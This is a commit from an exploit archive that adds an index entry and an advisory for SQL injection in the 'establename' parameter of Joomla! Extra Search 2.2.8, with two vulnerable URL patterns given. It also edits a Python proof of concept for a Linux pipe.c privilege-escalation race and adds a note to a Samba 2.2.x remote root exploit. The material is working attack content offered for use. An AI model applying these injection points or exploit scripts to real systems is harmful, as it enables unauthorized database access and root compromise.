DB: 2017-03-22
1 new exploits Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection
This commit is contained in:
parent
07432556e0
commit
93635f1158
4 changed files with 27 additions and 1 deletions
|
@ -37573,3 +37573,4 @@ id,file,description,date,author,platform,type,port
|
|||
41642,platforms/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' Parameter SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0
|
||||
41644,platforms/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80
|
||||
41662,platforms/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps,0
|
||||
41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -2,11 +2,15 @@
|
|||
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
|
||||
# PoC by Matthew Bergin
|
||||
# Bugtraq ID: 36901
|
||||
#
|
||||
# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/82/files
|
||||
|
||||
import os
|
||||
import time
|
||||
import random
|
||||
#infinite loop
|
||||
i = 0
|
||||
x = 0
|
||||
while (i == 0):
|
||||
os.system("sleep 1")
|
||||
while (x == 0):
|
||||
|
@ -14,7 +18,7 @@ while (i == 0):
|
|||
pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
|
||||
if (pid == 0): #need an active pid, race condition applies
|
||||
print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
|
||||
return
|
||||
break
|
||||
else:
|
||||
print "[+] PID: " + pid
|
||||
loc = "echo n > /proc/" + pid + "/fd/1"
|
||||
|
|
19
platforms/php/webapps/41663.txt
Executable file
19
platforms/php/webapps/41663.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Extra Search v2.2.8 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 21.03.2017
|
||||
# Vendor Homepage: http://www.joomlaboat.com/
|
||||
# Software: http://www.joomlaboat.com/extra-search
|
||||
# Demo: http://www.joomlaboat.com/
|
||||
# Version: 2.2.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_extrasearch&view=details&listing_id=1&establename=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_extrasearch&controller=createusers&establename=[SQL]
|
||||
# # # # #
|
|
@ -6,6 +6,8 @@ A buffer overflow vulnerability has been reported for Samba. The problem occurs
|
|||
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
|
||||
|
||||
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
|
||||
|
||||
E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/78/files
|
||||
*/
|
||||
|
||||
/* 0x333hate => samba 2.2.x remote root exploit
|
||||
|
|
Loading…
Add table
Reference in a new issue